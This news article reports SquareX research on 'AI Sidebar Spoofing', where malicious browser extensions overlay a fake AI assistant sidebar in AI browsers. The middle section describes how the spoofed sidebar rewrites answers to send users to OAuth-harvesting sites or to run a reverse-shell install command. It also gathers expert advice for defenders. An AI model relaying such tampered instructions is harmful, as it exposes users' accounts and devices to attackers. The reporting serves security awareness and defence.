AI browsers may be smart, but they’re not smart enough to block a common threat: Malicious extensions.

That’s the conclusion of researchers at SquareX, who on Thursday released a report showing how attackers can exploit AI sidebars through compromised browser extensions.

This attack vector isn’t new. Malicious extensions have been inserted into browser web stores to infect standard browsers such as Chrome, Edge, Firefox, and others for years.

What SquareX discovered are malicious extensions that can spoof the legitimate AI sidebars people use for queries. Their goal is to trick users into going to malicious websites, running data exfiltration commands, or installing backdoors. AI sidebar spoofing even works on the just-released OpenAI Atlas browser, SquareX says.

One solution for CISOs and CIOs is to ban the use of AI browsers, it suggests. That assumes the IT department can manage which browsers staff are using, particularly if they are allowed to use their own internet-connected devices. At the very least, IT must audit all extensions installed by employees for AI and non-AI browsers, the report says.

Treat anything AI with zero-trust protocols

CISOs and CIOs need to treat anything AI with the strongest zero-trust protocols available, commented Ed Dubrovsky, chief operating officer of incident response firm Cypfer, at least until some better functioning guardrails are established. 

“Establish a set of guardrails around AI use and functionality,” he said, “and if you are allowing AI vulnerable software into your corporate network, segment it into a place where it can’t get into the Digital Crown Jewels, or even have an awareness of them.” 

He pointed out that AI is a completely different playing field, and CSOs are not yet prepared for it. The challenge is that IT leaders are trying to think of AI as a new tool or toolset and are trying to apply software development and maintenance methodologies to its management. 

But in his view, AI is closer to “I just hired 100 new employees with very little vetting or appropriate security controls, how do I secure my assets in case some of them are malicious?”

“AI is not only a language chatbot, but it also has agentic function where tasks are defined and deployed, and AI software can be written and deployed by AI,” he said. “This pushes the human away from the keyboard, in a way, and replaces it with a new software capability.” 

The risk is that AI is not, and likely never will be, completely foolproof, he added. There may come a day where AI will be powerful enough to avoid most human ability to fool it, but, he asked, can it avoid being manipulated by other AIs? 

‘Dumpster fires’

David Shipley, head of Canadian employee security awareness training firm Beauceron Security, agrees.

“I think if CISOs are bored and want to spice up their lives with an incident, they should roll out these AI-powered hot messes to their users,” he said .

“But, if they’re like most CISOs and they have lots of problems, but free time and boredom aren’t on that list, they should avoid these dumpster fires [AI browsers] at all costs.”

Building and supporting a legitimate browser and extension ecosystem is difficult work, he argued, pointing out that even Apple, Google, and Microsoft still have issues.

“I think it’s a mistake to think of the risk as just being about extensions,” he added. “It’s the fundamental DNA of these browsers that is bad; the companies aren’t incented to pay enough attention to the problems, and bad extensions are just the straw that breaks cybersecurity’s back.”

How it works

CISOs have a tough challenge: It’s not hard to fool an employee into downloading and installing a malicious extension for any browser; browser extensions are supposed to be attractive add-on utilities such as password managers or AI productivity assistants. They are promoted in phishing and smishing messages, social media posts and, when threat actors are able, uploaded to marketplaces such as the Google Chrome Web Store. They can be malware disguised as a legitimate extension or can be a compromised version of one.

In AI Sidebar Spoofing, says the SquareX report, once a victim opens a new AI browser tab, the malicious extension injects JavaScript into the web page to create a fake sidebar that looks exactly like a legitimate sidebar. When the user enters a prompt into the spoofed sidebar, the extension hooks into its AI engine. But if the prompt requests certain instructions or guides, the responses can be manipulated to include additional instructions to the user. So, for example, if the user asks for good file sharing sites, the malicious extension might provide a link to the attacker’s file sharing site that requests high risk OAuth permissions that it can harvest. In the hands of a hacker, they could allow access to the victim’s email.

In one test, when a SquareX researcher asked a malicious sidebar extension how to install the Homebrew package manager for macOS or Linux, the instructions included an installation command line that executed a reverse shell command that would have connected the victim’s device to the attacker’s server. That would have given the attacker a system shell in which to execute commands on the victim’s machine.

It’s critical that infosec leaders set granular browser-native policies that prevent users from carrying out malicious tasks as instructed by a fake AI sidebar, says the report. These would include a policy that blocks advanced phishing sites using advanced machine learning and page heuristic analysis, a policy that  blocks high risk permissions from being granted to non-allowlisted apps, and a policy that warns users about and blocks copies of malicious/risky Linux commands.

The research “is a warning shot for the early days of agentic browsing and [reminds users] that the implicit trust model of the UI needs rethinking,” said Gabrielle Hempel, security operations strategist at Exabeam.

“The main issue here is that agentic-AI browsers introduce an entirely new attack surface. This attack, a malicious extension injecting a fake AI sidebar overlay that looks like the real one, allows threat actors to hijack the ‘trusted’ AI assistant UI and trick users into executing dangerous operations,” she pointed out. “Organizations need to be taking this seriously, because when you delegate browsing and actions to an AI sidebar, you are elevating what previously might have been a minor risk into a material risk to cloud assets, credentials, and devices.”

IT leaders should restrict AI browser use for high-risk functions until they are proven secure, she advised, adding that, because the attack uses an extension with host and storage permissions, organizations should revisit their extension approval workflows for those as well. In fact, any productivity tool that requests broad access should require scrutiny.

“Segmentation is also important once these tools are implemented: least privilege applies here and AI interaction with certain tabs/services should be limited,” she said. 

This article originally appeared on Computerworld.

Read More